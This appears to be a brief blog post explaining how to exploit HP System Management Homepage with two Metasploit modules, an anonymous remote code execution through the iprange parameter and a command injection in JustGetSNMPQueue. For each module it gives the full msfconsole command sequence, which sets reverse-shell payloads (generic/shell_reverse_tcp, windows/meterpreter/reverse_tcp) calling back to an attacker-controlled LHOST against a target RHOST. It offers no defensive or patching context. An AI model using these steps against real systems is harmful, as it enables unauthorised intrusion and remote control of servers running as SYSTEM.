Exploit HP sytem managment

 There are two modules available for exploitation of hp system management.

(1)HP System Management Anonymous Access Code Execution

This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled.

Exploit Targets

    0 - HP System Management 7.1.1 - Linux (CentOS) (default)
    1 - HP System Management 6.3.0 - Linux (CentOS)

msf > use exploit/linux/http/hp_system_management
msf exploit(hp_system_management) > show payloads
msf exploit(hp_system_management) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(hp_system_management) > set LHOST [MY IP ADDRESS]
msf exploit(hp_system_management) > set RHOST [TARGET IP]
msf exploit(hp_system_management) > exploit

(2)HP System Management Homepage JustGetSNMPQueue Command Injection

This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution under the context of SYSTEM

Exploit Targets

    0 - Windows (default)

msf > use exploit/windows/http/hp_sys_mgmt_exec
msf exploit(hp_sys_mgmt_exec) > show payloads
msf exploit(hp_sys_mgmt_exec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(hp_sys_mgmt_exec) > set LHOST [MY IP ADDRESS]
msf exploit(hp_sys_mgmt_exec) > set RHOST [TARGET IP]
msf exploit(hp_sys_mgmt_exec) > exploit

No comments: